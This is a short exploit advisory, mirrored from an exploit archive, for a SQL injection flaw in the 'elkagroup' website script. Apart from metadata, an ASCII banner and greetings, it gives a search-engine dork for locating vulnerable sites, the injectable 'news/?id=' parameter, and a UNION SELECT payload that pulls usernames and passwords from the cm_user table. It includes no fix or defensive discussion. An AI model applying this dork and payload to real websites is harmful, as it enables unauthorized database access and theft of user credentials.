Elkagroup SQL Injection

2009-12-07T00:00:00
ID PACKETSTORM:83530
Type packetstorm
Reporter SadHaCkEr
Modified 2009-12-07T00:00:00

Description

                                        
                                            `# Title: elkagroup SQL Injection Vulnerability  
# EDB-ID: 10330  
# CVE-ID: ()  
# OSVDB-ID: ()  
# Author: SadHaCkEr  
# Published: 2009-12-06  
# Verified: no  
# Download Exploit Code  
# Download N/A  
  
view source  
print?  
#Dork : "powered by: elkagroup"  
  
[*]##############################################  
[+] |____SadHaCkEr__|__\ #  
[+] |______________________|___||\*___ #  
[+] |______________________|___||""|"*\___, #  
[+] |______________________|___||""|*"|___|| #  
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)* #  
[+]========================================================================================================================================||  
[*] About : elkagroup SQL Injection Vulnerability (Iranian Script) ||  
[!] Site : http://www.elkagroup.com ||  
[!] Author : SadHaCkEr ||  
[!] Site : www.alkrsan.net + www.tryag.cc ||   
[!] E-Mail : sad@hack3d.org ||  
[!] Location : Saudi Arabia ||  
[!]=========================================================================================================================================||  
[!] MyWebSite http://www.sadx.297m.com ||  
[!]=========================================================================================================================================||  
[!] Exp:  
[!] http://server/news/?id=[SQL] ||  
[!]  
[!] [SQL] : ||  
[!] UNION SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(username,char(58),password),12,13,14,15,16,17,18,19,20,21,22,23 FROM+cm_user--  
[!] ||  
[!]   
[!] ||   
[!] Greetz 2 : alkrsan - þAlaooy HaCkEr - S.C.T - RXH - ayaster - Mr.Wolf and All My Friends  
[!] ||  
[!] Sad Team  
[!] ||  
[!]  
[!]   
[!]=========================================================================================================================================||  
  
`